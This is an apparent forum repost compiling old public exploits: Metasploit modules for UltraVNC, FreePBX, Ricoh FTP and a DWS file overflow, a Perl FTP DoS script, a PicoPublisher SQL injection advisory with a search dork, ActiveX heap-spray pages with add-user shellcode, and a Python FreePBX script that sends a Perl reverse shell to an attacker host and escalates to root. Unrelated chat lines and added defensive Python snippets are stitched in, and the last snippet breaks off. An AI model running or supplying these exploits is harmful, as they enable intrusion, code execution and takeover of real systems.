          'DisablePayloadHandler' => 'true'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 2000,
          'BadChars'        => "\x00\x0a\x0d",
          'DisableNops'     => true,
          'StackAdjustment' => -3500
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3',
            {
              'Ret'    => 0x20d6c32c, # push esp # ret - nrp.DLL
              'Offset' => 524
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 28 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.dws']),
      ], self.class)
  end

  def exploit
    buffer  = rand_text(target['Offset'])   # filler up to the saved return address
    buffer << [target.ret].pack('V')        # push esp # ret
    buffer << make_nops(30)
    buffer << payload.encoded

    file_create(buffer)
  end
end
-
KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit
#!/usr/bin/perl
#################################################################################
# Advisory: KnFTPd 1.0.0 'FEAT' DoS PoC-Exploit
# Author: Stefan Schurtz
# Affected Software: Successfully tested on KnFTPd 1.0.0
# Vendor URL: http://knftp.sourceforge.net/
# Vendor Status: informed
# CVE-ID: -
# PoC-Version: 1.0
#################################################################################

use strict;
use Net::FTP;

my $user     = "system";
my $password = "secret";

########################
# connect
########################
my $target  = $ARGV[0];
my $plength = $ARGV[1];

print "\n";
print "\t#######################################################\n";
print "\t# This PoC-Exploit is only for educational purpose!!! #\n";
print "\t#######################################################\n";
print "\n";

if (!$ARGV[0] || !$ARGV[1]) {
    # $0 is the script name ($@ holds the last eval error and was a typo here)
    print "[+] Usage: $0 <target> <payload length>\n";
    exit 1;
}

my $ftp = Net::FTP->new($target, Timeout => 12) or die "Cannot connect to $target: $@";
print "[+] Connected to $target\n";

########################
# login
########################
$ftp->login($user, $password) or die "Cannot login ", $ftp->message;
print "[+] Logged in with user $user\n";

###################################################
# Building payload './A' with min. length of 94
###################################################
my @p = ( "", "./A" );
my $payload;
print "[+] Building payload\n";
# each iteration appends one "./A" and extends @p so the next index exists
for (my $i = 1; $i <= $plength; $i++) {
    $payload .= $p[$i];
    push(@p, $p[$i]);
}
sleep(3);

#########################################
# Sending payload
#########################################
print "[+] Sending payload [$payload]\n";
$ftp->quot('FEAT ' . "$payload");

##########################################
# disconnect
##########################################
print "[+] Done\n";
$ftp->quit;
exit 0;
#EOF
-
PicoPublisher v2.0 Remote SQL Injection
# Exploit Title : PicoPublisher v2.0 Remote SQL injection
# Date : 29/03/2012
# Author : ZeTH
# Contact : zeth/at/hacktheplan8/dot/com http://www.hacktheplan8.com
# Vendor : Pico Software
# Site : http://pico.no/
# Version : 2.0
# Price : $29,00
# Dork : intext:"Drives med PicoPublisher"
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
--[1]-- Introduction
PicoPublisher business software
PicoPublisher is a product from Pico Software
[Manage your website]
PicoPublisher makes it easy to manage your website. With the built in
templates you can add columns, slideshows, tabs, boxes and videos
directly from the text editor.
[Manage your customers]
CRM systems are often too expensive for small businesses. With
PicoPublisher you can manage your customers just as easy as your
website. And at the same place!
[Create invoices]
Create professional PDF invoices in seconds. Add products to the
database and insert products to the invoice directly. You will get
notifications when invoices are overdue.
--[2]-- Vulnerability
Files :
[+] page.php
[+] single.php
Attack Method : Remote SQL injection
POC :
[+] http://site/page.php?id=SQLi
[+] http://site/single.php?id=SQLi
Tables :
+-------------------+
| customers
| expenses
| gallery_category
| gallery_photos
| invoice_reminders
| invoices
| invoices_product
| menu_items
| menus
| notes
| options
| orders
| orders_product
| pages
| pico_comments
| pico_config
| pico_karma_voted
| posts
| product_list
| users
+-------------------+
--[3]-- Greetz
hacktheplan8 [hellcome to new friends kasp3r, Pitung]
MainHack Brotherhood, Kecoak Elektronik, Echo
packetstormsecurity, exploit-db, 1337day
Paman, Vrs-hCk, OoN_BoY, em|nem, [S]hiro, Martin, xshadow, ElDiablo,
Furkan, pizzyroot, H312Y
-
Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution
Quest InTrust 10.4.x Annotation Objects ActiveX Control
AnnotateX.dll Uninitialized Pointer Remote Code Execution
homepage: http://www.quest.com/intrust/
description: "InTrust securely collects, stores, reports and
alerts on event log data from Windows, Unix and Linux systems,
helping you comply with external regulations, internal policies
and security best practices."
download url of a test version:
http://www.quest.com/downloads/
file tested: Quest_InTrust---Full-Package_104.zip
Background:
The mentioned product installs an ActiveX control
with the following settings:
binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
According to the IObjectSafety interface it is
safe for scripting and safe for initialization, so
Internet Explorer will allow scripting of this control
from remote.
Vulnerability:
By invoking the Add() method it is
possible to call into a memory region of choice
set by the attacker through e.g. heap spray or other
techniques.
Example code:
<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj'>
</object>
<script>
obj.Add(0x76767676,1);
</script>
...
eax=76767676 ebx=4401e51c ecx=01f85340 edx=00000000 esi=01f85340 edi=00000001
eip=4400ae62 esp=015fd134 ebp=015fd140 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
ANNOTA_1+0xae62:
4400ae62 ff1485504a0244 call dword ptr ANNOTA_1!DllUnregisterServer+0x19235 (44024a50)[eax*4] ds:0023:1ddc2428=????????
...
You are in control of eax: fully exploitable.
As attachment, proof of concept code.
<!--
Quest InTrust 10.4.x Annotation Objects ActiveX Control
(ANNOTATEX.DLL) Uninitialized Pointer Remote Code Execution PoC
(ie7)
binary path: C:\PROGRA~1\COMMON~1\SOFTWA~1\ANNOTA~1.DLL
CLSID: {EF600D71-358F-11D1-8FD4-00AA00BD091C}
ProgID: AnnotationX.AnnList.1
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='obj'>
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1000;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
obj.Add(0x76767676,1); //this should result in an address beginning with 0x1d1d[..]
</script>
-
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:
File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
Vulnerability:
This ActiveX control exposes the vulnerable
OpenFileDlg() method, see typelib:
...
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
/* VT_BSTR [8] [in] */ $sFilter
)
{
/* method OpenFileDlg */
}
...
By invoking this method with an overlong argument it is possible
to overflow a buffer. This is because of an insecure
WideCharToMultiByte() call inside UltraMJCamX.ocx:
Call stack of main thread
Address Stack Procedure / arguments Called from Frame
001279FC 77E6F20B kernel32.77E637DE kernel32.77E6F206 00127A0C
00127A10 0299F958 kernel32.WideCharToMultiByte UltraMJC.0299F952 00127A0C
00127A14 00000003 CodePage = 3
00127A18 00000000 Options = 0
00127A1C 03835C5C WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
00127A20 FFFFFFFF WideCharCount = FFFFFFFF (-1.)
00127A24 00127A50 MultiByteStr = 00127A50
00127A28 00007532 MultiByteCount = 7532 (30002.)
00127A2C 00000000 pDefaultChar = NULL
00127A30 00000000 pDefaultCharUsed = NULL
00127A3C 029B11D0 UltraMJC.0299F920 UltraMJC.029B11CB 00127A38
...
0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8]
0299F937 C600 00 mov byte ptr ds:[eax],0
0299F93A 6A 00 push 0
0299F93C 6A 00 push 0
0299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10]
0299F941 51 push ecx
0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8]
0299F945 52 push edx
0299F946 6A FF push -1
0299F948 8B45 0C mov eax,dword ptr ss:[ebp+C]
0299F94B 50 push eax
0299F94C 6A 00 push 0
0299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14]
0299F951 51 push ecx
0299F952 FF15 20319F02 call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------
...
The result is that critical structures (SEH) are overwritten,
allowing execution of arbitrary code against the target browser.
As attachment, basic proof of concept code.
<!--
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow poc
IE7-nodep
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1888;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x ="";
for (i=0; i<15000; i++){
x = x + "&";
}
obj.OpenFileDlg(x);
</script>
-
Do these guys sell everything? They'd sell the table too if they have customers.
-
-
No point spending money on them; starting tomorrow, try not smoking at all and see how long you last.
-
UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',
      'Description'    => %q{
        This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.
        If a malicious server responds to a client connection indicating a minor
        protocol version of 14 or 16, a 32-bit integer is subsequently read from
        the TCP stream by the client and directly provided as the trusted size for
        further reading from the TCP stream into a 1024-byte character array on
        the stack.
      },
      'Author'         => 'noperand',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2008-0610' ],
          [ 'OSVDB', '42840' ],
          [ 'BID', '27561' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space' => 500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Feb 6 2008',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
      ], self.class)
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)

    sploit = rand_text_alpha(1100)          # junk, could be more efficient here
    sploit << "\x00\x04\x00\x00"            # value to get around a write
    sploit << rand_text_alpha(12)           # random junk
    sploit << "\xEB\x06" << make_nops(2)    # short relative jump
    sploit << [target.ret].pack('V')        # pop/pop/ret (default is in vncviewer.exe)
    sploit << payload.encoded

=begin
We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016").
- These bytes are read directly by a call to ReadExact() with a size of 12.
...
if (m_minorVersion == 14 || m_minorVersion == 16)
{
  int size;
  ReadExact((char *)&size,sizeof(int));
  char mytext[1024]; //10k
  ReadExact(mytext,size);
  mytext[size]=0;
...
If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.
We then append our data.
=end

    sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit

    print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
    client.put(sploit)

    handler(client)
    service.close_client(client)
  end
end
Sursa: UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
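The bug the module describes is a missing bounds check: the client trusts a size taken straight off the wire before copying into a fixed 1024-byte stack buffer. The following is an added example (not UltraVNC code and not part of the Metasploit module) showing what a hardened reader of that same handshake has to check. It interprets the 4-byte size the way the x86 client's raw `ReadExact` into an `int` does, as a native little-endian 32-bit integer, and the sample streams are constructed inline rather than captured from a real server.

```python
import re
import struct

# The vulnerable UltraVNC branch copies the server-supplied size straight into a
# 1024-byte stack array; a hardened reader must bound the size by that buffer
# and leave room for the terminating NUL written by mytext[size] = 0.
TEXT_BUF_SIZE = 1024

_VERSION_RE = re.compile(rb"RFB (\d{3})\.(\d{3})\n")


class RfbError(ValueError):
    """Raised when the server's handshake bytes are malformed or unsafe."""


def read_exact(data, n):
    """Analogue of the client's ReadExact(): take exactly n bytes or fail."""
    if n < 0 or len(data) < n:
        raise RfbError("stream ended before %d bytes were available" % n)
    return data[:n], data[n:]


def parse_version(data):
    """Parse the 12-byte 'RFB xxx.yyy\\n' greeting; return (major, minor, rest)."""
    raw, rest = read_exact(data, 12)
    m = _VERSION_RE.fullmatch(raw)
    if not m:
        raise RfbError("malformed version string %r" % raw)
    return int(m.group(1)), int(m.group(2)), rest


def read_server_text(data):
    """Hardened counterpart of the minor-version 14/16 branch.

    Returns (text, rest); text is None when the branch does not apply.
    The size is read as a native little-endian 32-bit int (x86 client).
    """
    _major, minor, rest = parse_version(data)
    if minor not in (14, 16):
        return None, rest
    raw, rest = read_exact(rest, 4)
    size = struct.unpack("<i", raw)[0]
    # The check the vulnerable client lacks: size must fit the buffer,
    # with one byte spare for the NUL terminator.
    if size < 0 or size >= TEXT_BUF_SIZE:
        raise RfbError("server text size %d exceeds %d-byte buffer"
                       % (size, TEXT_BUF_SIZE))
    text, rest = read_exact(rest, size)
    return text, rest


def is_safe_handshake(data):
    """Predicate form, e.g. for a protocol fuzzer or an IDS pre-filter."""
    try:
        read_server_text(data)
    except RfbError:
        return False
    return True


# Constructed sample streams (not captured traffic).
BENIGN = b"RFB 003.016\n" + struct.pack("<i", 5) + b"hello"
OVERSIZED = b"RFB 003.016\n" + struct.pack("<i", 1100) + b"A" * 1100  # 1100 > 1024
NEGATIVE = b"RFB 003.014\n" + struct.pack("<i", -1)
PLAIN_38 = b"RFB 003.008\n"  # ordinary 3.8 server: the text branch never runs

if __name__ == "__main__":
    for name, stream in [("benign", BENIGN), ("oversized", OVERSIZED),
                         ("negative", NEGATIVE), ("3.8", PLAIN_38)]:
        print(name, "safe" if is_safe_handshake(stream) else "rejected")
```

The check is deliberately `size >= TEXT_BUF_SIZE` rather than `>`: the original code writes `mytext[size] = 0` after the copy, so even a size exactly equal to the buffer length is an off-by-one write.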
-
FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution',
      'Description'    => %q{
        This module exploits FreePBX version 2.10.0, 2.9.0 and possibly older.
        Due to the way callme_page.php handles the 'callmenum' parameter, it
        is possible to inject code to the '$channel' variable in function
        callme_startcall in order to gain remote code execution.

        Please note in order to use this module properly, you must know the
        extension number, which can be enumerated or bruteforced, or you may
        try some of the default extensions such as 0 or 200. Also, the call
        has to be answered (or go to voice).

        Tested on both Elastix and FreePBX ISO image installs.
      },
      'Author'         => [ 'muts', 'Martin Tschirsich' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.exploit-db.com/exploits/18649/' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 20 2012'))

    register_options(
      [
        OptString.new("EXTENSION", [ true, "A range of Local extension numbers", "0-100" ]),
      ], self.class)
  end

  def exploit
    # Check range input
    if datastore['EXTENSION'] =~ /^(\d+)\-(\d+)$/
      min = $1.to_i
      max = $2.to_i
    else
      print_error("Please specify a range for option 'EXTENSION'")
      return
    end

    cmd = Rex::Text.uri_encode(payload.encoded)

    (min..max).each do |e|
      connect
      print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}")
      res = send_request_raw({
        'method'  => 'GET',
        'uri'     => "/recordings/misc/callme_page.php?action=c&callmenum="+e.to_s+"@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A",
        'version' => '1.0',
        'vhost'   => rhost
      })
      handler
      disconnect
    end
  end
end
Sursa: FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
-
Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
      'Description'    => %q{
        This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
        service. By supplying a long string of data to the USER command, it is
        possible to trigger a stack-based buffer overflow, which allows remote code
        execution under the context of the user.

        Please note that in order to trigger the vulnerability, the server must
        be configured with a log file name (by default, it's disabled).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Julien Ahrens', #Discovery, PoC
          'sinn3r'         #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '79691'],
          ['URL', 'http://secunia.com/advisories/47912'],
          ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
        ],
      'Payload'        =>
        {
          # Yup, no badchars
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows XP SP3',
            {
              'Ret'    => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)
              'Offset' => 245
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Mar 1 2012",
      'DefaultTarget'  => 0))

    # We're triggering the bug via the USER command, no point to have user/pass
    # as configurable options.
    deregister_options('FTPPASS', 'FTPUSER')
  end

  def check
    connect
    disconnect

    if banner =~ /220 DSC ftpd 1\.0 FTP Server/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    buf = ''
    buf << rand_text_alpha(target['Offset'], payload_badchars)
    buf << [target.ret].pack('V')
    buf << make_nops(20)
    buf << payload.encoded

    print_status("#{rhost}:#{rport} - Sending #{self.name}")
    connect
    send_user(buf)
    handler
    disconnect
  end
end

=begin
0:002> lmv m SR10
start    end        module name
00400000 00410000   SR10       (deferred)
    Image path: C:\Program Files\DC Software\SR10.exe
    Image name: SR10.exe
    Timestamp:        Mon May 19 23:55:32 2008 (483275E4)
    CheckSum:         00000000
    ImageSize:        00010000
    File version:     1.0.0.520
    Product version:  1.0.0.0
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        1.0 App
    File date:        00000000.00000000
    Translations:     0409.04b0
    CompanyName:      Ricoh Co.,Ltd.
    ProductName:      SR-10
    InternalName:     SR-10
    OriginalFilename: SR10.EXE
    ProductVersion:   1, 0, 0, 0
    FileVersion:      1, 0, 0, 520
    PrivateBuild:     1, 0, 0, 520
    SpecialBuild:     1, 0, 0, 520
    FileDescription:  SR-10

Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
stable component we can use is msvcrt.dll for now.
=end
Sursa: Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
-
FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2010
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Sursa: FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
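Both the Metasploit module above and this standalone script reach code execution the same way: a `callmenum` value that carries URL-encoded CR/LF pairs (`%0D%0A`) so that extra `Application:`/`Data:` lines land in the Asterisk manager action that `callme_startcall` builds from it. The following is an added example (not FreePBX code and not part of either exploit) of how a defender can pick those requests out of a web server access log, together with the allow-list check a server-side fix would apply to the parameter. The log lines are constructed, in Apache combined format, and the `\d+`-only rule for extensions is an assumption about how FreePBX extensions are numbered.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx combined log format (sample lines are constructed below).
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumption: a legitimate callmenum is a bare numeric extension, nothing else.
_EXTENSION_RE = re.compile(r"\d+")
# Header names that only make sense inside an Asterisk manager action.
_AMI_KEYWORDS = ("application:", "data:", "channel:", "action:")


def valid_callmenum(value):
    """Server-side allow-list check for the parameter."""
    return _EXTENSION_RE.fullmatch(value) is not None


def inspect_target(target):
    """Return the reasons a request target looks like callmenum injection."""
    parts = urlsplit(target)
    if not parts.path.endswith("/recordings/misc/callme_page.php"):
        return []
    # parse_qs decodes %0D%0A, so the CR/LF check sees the real characters.
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for value in params.get("callmenum", []):
        if "\r" in value or "\n" in value:
            reasons.append("CRLF in callmenum")
        lowered = value.lower()
        if any(k in lowered for k in _AMI_KEYWORDS):
            reasons.append("AMI keyword in callmenum")
        if not valid_callmenum(value):
            reasons.append("callmenum is not a bare extension")
    return reasons


def scan_log(text):
    """Return (ip, target, reasons) for every log line that trips a check."""
    findings = []
    for line in text.splitlines():
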